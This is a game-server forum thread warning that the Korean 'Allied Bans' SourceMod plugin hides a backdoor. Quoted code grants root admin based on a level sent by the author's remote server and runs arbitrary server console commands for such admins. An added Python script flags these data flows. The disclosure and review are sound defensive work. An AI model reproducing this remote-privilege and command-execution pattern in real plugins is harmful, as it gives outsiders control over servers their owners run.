South Korea Allied Bans


Raritylicious
Member
Join Date: Mar 2014
Location: South Korea
Old 09-16-2014 , 01:39   South Korea Allied Bans
Reply With Quote #1

So, there is a system called "Allied Bans" which saves users' information to a database.
And whoever gets banned will not be able to enter the servers that use "AlliedBans".
Friagram made a thread about this before but I want this thing to get cleared up.

So as some of you guys know (if you read his thread), a lot of Korean servers use it.
And from the looks of its source code, it's giving AlliedBans admins RCON powers.
Some even have full rcon powers I think.
Also, it gives AlliedBans admins the reserved slots with full color chat/name/tag.
What bothers me in this part is, they didn't mention anything about RCON shits when they released the plugin. (compiled SMX of course)
They did mention getting chat tags stuff and reserved slots.
But this is MY server and they don't have rights to have that kind of powers which I don't want them to have.
And I can't even modify the plugin LOL (little explanation written below)

Yes, I was the guy who friagram mentioned.
And today, I stopped using "Allied Bans", which I should have done a long time ago.

Friagram also told me if the server has the socket extension and they have full RCON, they can just
extract or delete my server files.
Even put viruses on it.
I spent dollars on my servers making awesome private plugins and maps made by friagram.
And I don't like what "Allied Ban" plugin is capable of.

Asher says he talked to the guy named Tommy who owns AlliedBans and he replied with
"I'll patch it soon"
"Will release sourcecode"
It's been half a year and RCON shits are still sitting there.

I included the source code he released
and if you can read korean, on the very top page it says,
"Do not modify this sourcecode and use it without any permissions"
"Modifying this plugin is violating the "license" of "Allied Bans" and you will be "AlliedBaned"

Is this shit even legal?

I didn't violate any of "AlliedBans" "license" so far but probably will get banned anyway for writing this.
So, dear AlliedModders admins, make it worth it.
Attached Files
File Type: txt alliedbans.sp.txt (79.1 KB, 231 views)

Last edited by Raritylicious; 09-17-2014 at 21:30.
Raritylicious is offline
friagram
Veteran Member
Join Date: Sep 2012
Location: Silicon Valley
Old 09-16-2014 , 02:23   Re: South Korea Allied Bans
Reply With Quote #2

I spoke with asherkin about this before, as a few different people have brought up this plugin in the past, and I warn them each time about using it when I hear about it. Anyways, this newer version did not change anything, basically the author just left in the remote admin flags, but did so in a more subtle way:
PHP Code:
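stock bool:IsRootAdmin(client)
{
    // client 0 is the server console
    if (client == 0) return true;
    // Level[] is filled in by HandleTAG from the remote server's reply
    if (Level[client] >= 495) return true;

    return false;
}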

So it used to query his db server with a password, but he switched to socket...

PHP Code:
public HandleTAG(String:receiveData[], client) {
    //Parse String

    decl String:tagdata[12][128];
    decl String:tagarray[12][256];
    decl String:clientAuth[64], String:bSteamID[64], String:sServername[64], String:sFlag[16];
    decl String:tTagcolor[128], String:tNickcolor[128], String:tChatcolor[128];
    decl String:leveldata[4][32];
    GetClientAuthString(client, clientAuth, sizeof(clientAuth));

    if (StrContains(receiveData, "!ABLEVEL!", false) >= 0) {
        ExplodeString(receiveData, "!ABLEVEL!", leveldata, sizeof(leveldata), sizeof(leveldata[]));
        Format(bSteamID, sizeof(bSteamID), leveldata[1]);

        if (StrEqual(bSteamID, clientAuth, false) == true) {
            // The level comes straight from the data received over the socket
            new mylevel = StringToInt(leveldata[2]);
            Level[client] = mylevel;
            new String:Message[128];
            Format(Message, sizeof(Message), "Your Clearance is LEVEL %d", mylevel);
            PrintToTarget(client, Message);
        }
    }
Now that's great and all, but let's not forget this little gem:
PHP Code:
public Action:Command_Command(client, args)
{
    if (!IsRootAdmin(client)) {
        ReplyToCommand(client, "[AlliedBANS] You have no access to this command");
        return Plugin_Handled;
    }
    if (args < 1)
    {
        ReplyToCommand(client, "[AlliedBANS] SYNTAX : sm_ab_command <command>");
        ReplyToCommand(client, "[AlliedBANS] USE TO KICK BANNED USERS WHO DO NOT GET KICKED AUTOMATICALLY");
        return Plugin_Handled;
    }
    new String:Commands[512];
    GetCmdArgString(Commands, sizeof(Commands));

    if (client == 0) // They will already see the response in the console.
    {
        ServerCommand("%s", Commands);
    } else {
        decl String:responseBuffer[4096];
        decl String:exploded[256][16];

        // The whole argument string is run as a server console command
        ServerCommandEx(responseBuffer, sizeof(responseBuffer), "%s", Commands);
        new segments = ExplodeString(responseBuffer, "\n", exploded, 16, 256, false);
        if (segments > 0) {
            ReplyToCommand(client, "### Start ###");
            for (new i = 0; i < segments; i++) {
                ReplyToCommand(client, "%s\n", exploded[i]);
            }
            ReplyToCommand(client, "### End ###");
        }
        ReplyToCommand(client, responseBuffer);
    }

    return Plugin_Handled;
}

new mylevel = StringToInt(leveldata[2]);
grabs the player's "level" from his database. Previously, when I logged in and queried his database to get the levels of all of the players, there were some 20+ individuals that would have been "given" root access alone (note that this was ~4 months ago, so the user list may have changed). Though, anyone could be added at any time, since it basically just queries that db (which you have no control over). Also, since this thing just queries tommy.or.kr via tcp to get this info, any attacker could use simple DNS hijacking to gain access (though perhaps unlikely).

I spoke with asherkin and got this response:
Quote:
05-12-14 , 08:22 AM Allied Bans (Kr)
Hey friagram,

Whoah! This one looks like it could be a mess.

I've moved your thread into a private forum for a bit while I look at it - the scope is quite massive and could be dire.

Thanks for the notice, I'll make the thread public again once we've got a better grasp of what's going on.

I noticed you're currently editing the thread, that'll probably fail - just PM me if there's anything else you'd like to add.

Regards,
Asher
and again:
Quote:
05-12-14 , 10:58 AM Re: Allied Bans (Kr)

Originally Posted by friagram
I didn't spend tons of time looking it over, but from what I saw and heard, there's a fair amount of people that run it. I told my Korean friends to just not use it, but they said that then all of the hackers/spammers/scammers would then start coming to their servers. Anyways, hard to tell looking at the queries just how many people use it, since I can't really query everything or dump the structure.

I had a long discussion with the author earlier, he's working towards getting an update out with full source code and less questionable admin access bits.

Thanks again,
Asher

As per the rcon/socket/updater mentions. While perhaps unlikely, this particular combination does create an enormous attack surface as you have:
1) admin
2) console access
3) ability to update plugins and thus use the entire sourcemod API to modify the filesystem
4) socket to do anything you want via TCP/UDP

So.. it would technically be possible for them to update the plugin, install other plugins/extensions, programs... Delete files that are not protected by the user. Perhaps even run system commands if your user privileges are not locked down.
__________________
Profile - Plugins
Add me on steam if you are seeking sp/map/model commissions.

Last edited by friagram; 09-16-2014 at 02:28.
friagram is offline
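
An added example, not code from the thread or from the plugin: a small Python review aid that follows the two data flows pointed out in the post above, the socket reply ending up in Level[] and the command argument string reaching ServerCommandEx. The sample source is condensed from the quoted excerpts; `network_inputs` and `privilege_vars` are assumptions the reviewer supplies.

```python
import re

# Constructed sample, condensed from the SourcePawn excerpts quoted in the thread.
SAMPLE = '''\
stock bool:IsRootAdmin(client) { if (Level[client] >= 495) return true; return false; }
public HandleTAG(String:receiveData[], client) {
    ExplodeString(receiveData, "!ABLEVEL!", leveldata, sizeof(leveldata), sizeof(leveldata[]));
    new mylevel = StringToInt(leveldata[2]);
    Level[client] = mylevel;
}
public Action:Command_Command(client, args) {
    new String:Commands[512];
    GetCmdArgString(Commands, sizeof(Commands));
    ServerCommandEx(responseBuffer, sizeof(responseBuffer), "%s", Commands);
}
'''
ID = r'[A-Za-z_]\w*'

def audit(source, network_inputs=("receiveData",), privilege_vars=("Level",)):
    """Line-based taint pass over plugin source; returns [(line_no, finding)]."""
    # Assumptions supplied by the reviewer: network_inputs are buffers filled
    # from the socket, privilege_vars are what the admin check reads.
    taint = {name: "network" for name in network_inputs}  # variable -> origin
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        code = re.sub(r'"(?:\\.|[^"\\])*"', '""', line).split("//")[0]
        # Source: everything typed after the command name.
        m = re.search(rf'\bGetCmdArgString\s*\(\s*({ID})', code)
        if m:
            taint[m.group(1)] = "command-args"
        # Propagation: ExplodeString(src, sep, dst, ...) copies src into dst.
        m = re.search(rf'\bExplodeString\s*\(\s*({ID})\s*,[^,]*,\s*({ID})', code)
        if m and m.group(1) in taint:
            taint[m.group(2)] = taint[m.group(1)]
        # Propagation and privilege sink: "lhs = <expression using a tainted var>".
        m = re.search(rf'\b({ID})\s*(?:\[[^\]]*\])?\s*=(?!=)\s*(.+);', code)
        origins = [taint[v] for v in re.findall(ID, m.group(2)) if v in taint] if m else []
        if origins:
            taint[m.group(1)] = origins[0]
            if m.group(1) in privilege_vars and "network" in origins:
                findings.append((no, "privilege level set from network data"))
        # Command sink: a tainted buffer is handed to the server console.
        m = re.search(r'\bServerCommand(?:Ex)?\s*\((.*)\)\s*;', code)
        hits = [taint[v] for v in re.findall(ID, m.group(1)) if v in taint] if m else []
        if hits:
            findings.append((no, "console command built from " + hits[0]))
    return findings
```

Either finding alone is a reason to read the surrounding code by hand; together they describe the remote-admin path discussed in this thread.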
Sreaper
髪を用心
Join Date: Nov 2009
Old 09-16-2014 , 03:35   Re: South Korea Allied Bans
Reply With Quote #3

Quote:
Originally Posted by Raritylicious View Post
"Modifying this plugin is violating the "license" of AlliedBans and you will be "AlliedBaned"
So in addition to backdoor admin, they are also claiming to manually add you to their ban list even if you aren't a cheater/scammer. You shouldn't run someone else's ban list unless you know the person very well. Who knows how many innocent people you've been keeping off your servers.

Last edited by Sreaper; 09-16-2014 at 03:36.
Sreaper is offline
Raritylicious
Member
Join Date: Mar 2014
Location: South Korea
Old 09-16-2014 , 03:45   Re: South Korea Allied Bans
Reply With Quote #4

Quote:
Originally Posted by Sreaper View Post
So in addition to backdoor admin, they are also claiming to manually add you to their ban list even if you aren't a cheater/scammer. You shouldn't run someone else's ban list unless you know the person very well. Who knows how many innocent people you've been keeping off your servers.
I regret using it
And I disabled it as well
And you're absolutely right
I can't claim what I'm about to say is 100 percent true but,
From what I heard, there were actually misunderstood innocent players who got "Allied Banned"
I once got banned as well for sharing a "similar match" of a hacker's IP address lol

Their power is too strong
Beyond what you can imagine
This has to change
Raritylicious is offline
GoD-Tony
Veteran Member
Join Date: Jul 2005
Old 09-16-2014 , 04:01   Re: South Korea Allied Bans
Reply With Quote #5

FYI, the sourcecode they're hosting is version "2.3.004A", and the smx is "3.140902A".
__________________

Last edited by GoD-Tony; 09-16-2014 at 04:02.
GoD-Tony is offline
lionheart1066
Senior Member
Join Date: Aug 2009
Old 09-16-2014 , 06:08   Re: South Korea Allied Bans
Reply With Quote #6

This is why you'd be better off building up your own ban list with something like Sourcebans instead of depending on someone else's ban list. And of course get a team of people that would be able to administrate your server according to the rules you set, along with the assistance of any plugins.
lionheart1066 is offline
Raritylicious
Member
Join Date: Mar 2014
Location: South Korea
Old 09-17-2014 , 01:19   Re: South Korea Allied Bans
Reply With Quote #7

I thought maybe someone who is related to SM license stuff might read this and take an action or something.
I guess I was wrong.
Raritylicious is offline
ddhoward
Veteran Member
Join Date: May 2012
Location: California
Old 09-17-2014 , 01:22   Re: South Korea Allied Bans
Reply With Quote #8

Quote:
Originally Posted by Raritylicious View Post
I thought maybe someone who is related to SM license stuff might read this and take an action or something.
I guess I was wrong.
What 'action' could be taken?

It's kind of hard for a US-based organization to take any action against South Koreans in South Korea for violating US law.
__________________

Last edited by ddhoward; 09-17-2014 at 01:23.
ddhoward is offline
ocwoody
AlliedModders Donor
Join Date: Nov 2010
Location: huh
Old 09-17-2014 , 02:11   Re: South Korea Allied Bans
Reply With Quote #9

Quote:
Originally Posted by ddhoward View Post
What 'action' could be taken?

It's kind of hard for a US-based organization to take any action against South Koreans in South Korea for violating US law.
Isn't there a blacklist function built into sourcemod just for these types of plugins?
__________________

ocwoody is offline
ddhoward
Veteran Member
Join Date: May 2012
Location: California
Old 09-17-2014 , 02:14   Re: South Korea Allied Bans
Reply With Quote #10

Quote:
Originally Posted by ocwoody View Post
Isn't there a blacklist function built into sourcemod just for these types of plugins?
I assume that it would be very possible to simply recompile Sourcemod without the blacklist.
__________________
ddhoward is offline